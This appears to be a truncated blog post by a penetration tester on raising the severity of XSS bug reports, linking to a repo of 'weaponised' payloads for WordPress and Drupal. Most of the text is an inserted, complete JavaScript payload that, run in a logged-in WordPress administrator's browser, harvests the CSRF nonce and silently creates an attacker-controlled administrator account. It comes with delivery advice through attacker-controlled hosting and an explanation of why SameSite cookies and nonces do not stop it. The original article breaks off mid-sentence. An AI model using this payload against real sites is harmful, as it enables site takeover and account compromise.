How to Upgrade Your XSS Bugs from Medium to Critical


TL;DR: Before you report an XSS, look for ways it can be leveraged to increase severity. Here's my repo containing weaponised JavaScript payloads for popular platforms like WordPress and Drupal. More will be added in the coming weeks.
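As an added illustration of the kind of leverage the TL;DR is talking about (my own example, not code from the article or from the linked repo): a payload that, when it runs in a logged-in WordPress administrator's browser, rides that session to create a brand-new administrator account. The WordPress form field and nonce names below are from memory and are assumptions to check against the target's own `wp-admin/user-new.php` HTML; the account details are hypothetical, and the sample form fragment is constructed for the helper functions, not a real capture.

```javascript
// Added example, not from the article or hakluke's repo.
// Escalates "I can execute JS in an admin's browser" to "I have an admin account"
// by fetching the Add New User form with the victim's cookies, harvesting the
// CSRF nonce, and posting the form back. Field names are assumed from WordPress's
// user-new.php and must be verified against the target before use.

const NONCE_FIELD = "_wpnonce_create-user"; // assumed WordPress nonce field name

// Pull the value of a hidden <input name="..."> out of raw HTML.
// Tolerates any attribute order and single or double quotes.
function extractHiddenInput(html, name) {
  const escaped = name.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  const tagRe = new RegExp(`<input[^>]*name=["']${escaped}["'][^>]*>`, "i");
  const tag = html.match(tagRe);
  if (!tag) return null;
  const val = tag[0].match(/value=["']([^"']*)["']/i);
  return val ? val[1] : null;
}

// Build the x-www-form-urlencoded body that "Add New User" submits.
// Field names are assumptions about WordPress's form; adjust if the target differs.
function buildCreateUserBody(nonce, { login, email, password }) {
  const p = new URLSearchParams();
  p.set("action", "createuser");
  p.set(NONCE_FIELD, nonce);
  p.set("_wp_http_referer", "/wp-admin/user-new.php");
  p.set("user_login", login);
  p.set("email", email);
  p.set("pass1", password);
  p.set("pass2", password);
  p.set("role", "administrator");
  p.set("createuser", "Add New User");
  return p.toString();
}

// The two-request chain. credentials: "same-origin" makes the browser attach the
// victim's session cookies, which is what turns the XSS into an admin action.
// A missing nonce doubles as a check that the victim is actually privileged.
async function escalateToAdmin(baseUrl, account) {
  const page = await fetch(`${baseUrl}/wp-admin/user-new.php`, { credentials: "same-origin" });
  const nonce = extractHiddenInput(await page.text(), NONCE_FIELD);
  if (!nonce) throw new Error("nonce not found: victim is not an admin or the form changed");
  const res = await fetch(`${baseUrl}/wp-admin/user-new.php`, {
    method: "POST",
    credentials: "same-origin",
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: buildCreateUserBody(nonce, account),
  });
  return res.status;
}

// Fire only inside a browser; under Node (when exercising the helpers) do nothing.
if (typeof window !== "undefined" && typeof document !== "undefined") {
  escalateToAdmin(location.origin, {
    login: "wpbackup", // hypothetical attacker-chosen credentials
    email: "wpbackup@example.com",
    password: "CorrectHorseBatteryStaple!1",
  }).catch(() => {});
}

// Constructed fragment of what user-new.php renders for a logged-in administrator
// (trimmed, not a real capture), used to exercise extractHiddenInput offline.
const SAMPLE_ADMIN_FORM = `
<form method="post" name="createuser" id="createuser" class="validate" novalidate="novalidate">
<input type="hidden" id="_wpnonce_create-user" name="_wpnonce_create-user" value="9f2d3ab4c1" />
<input type="hidden" name="_wp_http_referer" value="/wp-admin/user-new.php" />
<input name="action" type="hidden" value="createuser" />
</form>`;
```

Deliver it from the XSS sink as an inline script or a `<script src=...>` pointing at attacker-controlled hosting; because both requests are same-origin and carry the victim's cookies, neither SameSite cookies nor the nonce stop it, which is exactly why an XSS that can do this is no longer a medium.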

It feels like every day that I see another under-leveraged XSS writeup hit my Twitter feed. I saw another one today, I don’t want to name and…

Luke Stephens (@hakluke)

Pentester | Hubby | Musician
